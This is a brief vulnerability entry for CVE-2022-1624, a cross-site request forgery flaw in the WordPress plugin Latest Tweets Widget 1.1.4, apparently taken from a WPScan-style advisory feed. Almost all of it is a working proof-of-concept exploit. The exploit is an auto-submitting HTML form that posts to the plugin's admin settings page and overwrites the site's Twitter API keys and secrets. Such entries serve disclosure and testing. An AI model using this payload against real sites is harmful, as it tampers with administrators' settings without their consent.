CVE: CVE-2022-1624

Name: Latest Tweets Widget (latest-tweets-widget)

Version: 1.1.4

Date: 2022-04-16 18:02:47

Advisory: https://wpscan.com/vulnerability/06e547fd-cddf-4294-87be-54f58d6138a7

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=twitter-api-admin" method="POST">
    <input type="text" name="saf_twitter[consumer_key]" value="hacked">
    <input type="text" name="saf_twitter[consumer_secret]" value="hacked">
    <input type="text" name="saf_twitter[access_key]" value="">
    <input type="text" name="saf_twitter[access_secret]" value="">
</form>
<script>
    document.forms[0].submit();
</script>